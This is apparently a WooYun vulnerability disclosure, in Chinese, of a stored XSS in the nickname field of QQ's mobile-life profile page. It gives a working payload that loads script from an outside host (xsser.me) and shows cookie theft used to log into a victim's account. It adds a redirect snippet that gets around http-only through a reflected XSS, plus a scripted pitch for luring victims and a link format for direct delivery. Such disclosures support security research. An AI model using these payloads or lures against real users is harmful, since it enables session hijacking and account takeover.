WooYun.org

QQ里很多地方都是嵌入的网页，所以我们对这些嵌入的网页系统的进行了分析。
而后，发现在手机生活这个功能页面中，昵称处未过滤，从而导致XSS。
1. 漏洞页面，个人资料，手机生活页面。
2. QQ用户昵称有一定的长度限制。为了在某种程度上绕过这种限制，我们利用之前在某漏洞中已经使用过的技巧，从webQQ来修改用户的昵称，将昵称修改为：<script src=//xsser.me/xxxxx> 即可。（因为昵称后方有 </script>闭合，因此利用代码无需加</script>）

3. 可以看到当用户打开页面，页面执行了我们指定的JS文件。

页面内的昵称没有被过滤

4. 用自己大号访问小号的个人资料--手机生活页面时。触发XSS，导致信息被记录。

弹个窗

5. 此次发布漏洞时，小号可成功利用登录信息来登录大号。 但是在之前测试时，发现此页面的cookie加了http-only，不知道现在为何又没了？挺奇怪。

6. 不过即使是之前加了http-only的情况，我们依然可以通过跳转到腾讯旗下任意一个反射型XSS，来间接获取到用户的cookies信息。

if(location.href.indexOf("m.qq.com")>-1){ location.href="反射型XSS地址"; }

7. 至于漏洞利用方法。
A. 诱使用户访问你的个人资料-手机生活页面。 至于怎么骗，看各人自己口才了，比如我会说：“hey, 帮我看看我的手机生活页面，为什么我能看到别人的，看不到我自己的啊，你那边能看到吗？我这边显示一片空白。。不知道是不是我网络问题啊。”
B. http://m.qq.com/client/cguest?frienduin=10001 这个页面本身没有做好有判定，因此任何人都可以访问到任何人的手机生活页面。比如上面是pony的手机生活页面。因而，http://m.qq.com/client/cguest?frienduin=带有XSS的QQ号码， 这个页面将可以直接用来作为XSS页面发送给受害者。